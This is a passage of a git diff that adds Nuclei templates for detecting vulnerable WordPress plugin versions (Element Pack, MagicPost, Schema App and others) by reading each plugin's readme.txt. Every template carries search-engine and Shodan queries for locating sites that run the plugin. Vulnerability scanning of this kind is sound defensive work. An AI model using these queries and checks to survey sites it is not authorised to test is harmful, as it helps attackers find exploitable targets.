@@ -0,0 +1,59 @@ +id: bdthemes-element-pack-lite-ef972b4a35b32092eeac378b1e4501b8 + +info: + name: > + Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) <= 5.10.12 - Missing Authorization + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d2d23e6f-d48f-4734-95f8-12bd58eb1c2f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bdthemes-element-pack-lite/" + google-query: inurl:"/wp-content/plugins/bdthemes-element-pack-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bdthemes-element-pack-lite,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bdthemes-element-pack-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bdthemes-element-pack-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.10.12') \ No newline at end of file diff --git a/poc/other/full-screen-menu-for-elementor.yaml b/poc/other/full-screen-menu-for-elementor.yaml new file mode 100644 index 0000000000..74e4961152 --- /dev/null +++ b/poc/other/full-screen-menu-for-elementor.yaml 
@@ -0,0 +1,59 @@ +id: full-screen-menu-for-elementor-d260d7eb2da867209574048a4e6c77b0 + +info: + name: > + Full Screen Menu for Elementor <= 1.0.7 - Authenticated (Contributor+) Post Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/feb0f29c-78df-46e6-a6f4-c8548d3e5185?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/full-screen-menu-for-elementor/" + google-query: inurl:"/wp-content/plugins/full-screen-menu-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,full-screen-menu-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/full-screen-menu-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "full-screen-menu-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.7') \ No newline at end of file diff --git a/poc/other/magicpost.yaml b/poc/other/magicpost.yaml new file mode 100644 index 0000000000..9978527c0e --- /dev/null +++ b/poc/other/magicpost.yaml 
@@ -0,0 +1,59 @@ +id: magicpost-6538fe9c7722fa6358b7d4a11ba3b7cc + +info: + name: > + MagicPost <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via wb_share_social Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f81355fa-5b12-4b03-bd3d-f9e2cb734390?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/magicpost/" + google-query: inurl:"/wp-content/plugins/magicpost/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,magicpost,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/magicpost/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "magicpost" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.1') \ No newline at end of file diff --git a/poc/other/pingmeter-uptime-monitoring.yaml b/poc/other/pingmeter-uptime-monitoring.yaml new file mode 100644 index 0000000000..e717f84929 --- /dev/null +++ b/poc/other/pingmeter-uptime-monitoring.yaml 
@@ -0,0 +1,59 @@ +id: pingmeter-uptime-monitoring-d35d40cd86cecdbd3e5f2c06b9034e3c + +info: + name: > + Pingmeter Uptime Monitoring <= 1.0.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7da41c7c-31c4-4e95-ac5a-25bd17e507b9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/pingmeter-uptime-monitoring/" + google-query: inurl:"/wp-content/plugins/pingmeter-uptime-monitoring/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,pingmeter-uptime-monitoring,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/pingmeter-uptime-monitoring/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "pingmeter-uptime-monitoring" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.3') \ No newline at end of file diff --git a/poc/other/woo-one-click-upsell-funnel.yaml b/poc/other/woo-one-click-upsell-funnel.yaml new file mode 100644 index 0000000000..6fa12be230 --- /dev/null +++ b/poc/other/woo-one-click-upsell-funnel.yaml 
@@ -0,0 +1,59 @@ +id: woo-one-click-upsell-funnel-98ebab5be77d58e4cde51e12bd3679c2 + +info: + name: > + One Click Upsell Funnel for WooCommerce <= 3.4.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via wps_wocuf_pro_yes Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c10d6cb-e0a7-4b8d-b50f-e23885355872?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-one-click-upsell-funnel/" + google-query: inurl:"/wp-content/plugins/woo-one-click-upsell-funnel/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-one-click-upsell-funnel,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-one-click-upsell-funnel/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-one-click-upsell-funnel" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.4.9') \ No newline at end of file diff --git a/poc/remote_code_execution/wb-custom-product-tabs-for-woocommerce.yaml b/poc/remote_code_execution/wb-custom-product-tabs-for-woocommerce.yaml new file mode 100644 index 0000000000..a3e82a5640 --- /dev/null +++ b/poc/remote_code_execution/wb-custom-product-tabs-for-woocommerce.yaml 
@@ -0,0 +1,59 @@ +id: wb-custom-product-tabs-for-woocommerce-0d6d3a2eb43a5b249c178d2b2d5f4cb5 + +info: + name: > + Custom Product Tabs For WooCommerce <= 1.2.4 - Authenticated (Shop Manager+) PHP Object Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fdc6a04-ef39-498a-b739-f40d5d8af47e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wb-custom-product-tabs-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/wb-custom-product-tabs-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wb-custom-product-tabs-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wb-custom-product-tabs-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wb-custom-product-tabs-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.4') \ No newline at end of file diff --git a/poc/sql/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml b/poc/sql/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml new file mode 100644 index 0000000000..7bbd676400 --- /dev/null +++ b/poc/sql/CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-11279-95a0a039b8f5be29ed46a2c8d1ddb636 + +info: + name: > + Schema App Structured Data <= 2.2.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Schema App Structured Data plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/48db673c-f978-45f4-9d7b-eddd81cee62e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11279 + metadata: + fofa-query: "wp-content/plugins/schema-app-structured-data-for-schemaorg/" + google-query: inurl:"/wp-content/plugins/schema-app-structured-data-for-schemaorg/" + shodan-query: 'vuln:CVE-2024-11279' + tags: cve,wordpress,wp-plugin,schema-app-structured-data-for-schemaorg,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/schema-app-structured-data-for-schemaorg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "schema-app-structured-data-for-schemaorg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.4') \ No newline at end of file 
diff --git a/poc/web/gwebpro-store-locator.yaml b/poc/web/gwebpro-store-locator.yaml new file mode 100644 index 0000000000..cfdf98d2d4 --- /dev/null +++ b/poc/web/gwebpro-store-locator.yaml @@ -0,0 +1,59 @@ +id: gwebpro-store-locator-a48522809c277db29c19ddd5318a9a6f + +info: + name: > + G Web Pro Store Locator <= 2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cb84b71e-7d4d-4bd7-88cb-1b86d7023edb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/gwebpro-store-locator/" + google-query: inurl:"/wp-content/plugins/gwebpro-store-locator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,gwebpro-store-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gwebpro-store-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gwebpro-store-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1') \ No newline at end of file diff --git a/poc/wordpress/wp-migrate-2-aws.yaml b/poc/wordpress/wp-migrate-2-aws.yaml new file mode 100644 index 0000000000..6da15ed022 --- /dev/null +++ b/poc/wordpress/wp-migrate-2-aws.yaml 
@@ -0,0 +1,59 @@ +id: wp-migrate-2-aws-e5583657ed5a9882a96eea1651f9a809 + +info: + name: > + WP on AWS <= 5.2.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c82dc37-0b9a-48c2-a8a6-fbee6182003f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-migrate-2-aws/" + google-query: inurl:"/wp-content/plugins/wp-migrate-2-aws/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-migrate-2-aws,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-migrate-2-aws/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-migrate-2-aws" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.2.1') \ No newline at end of file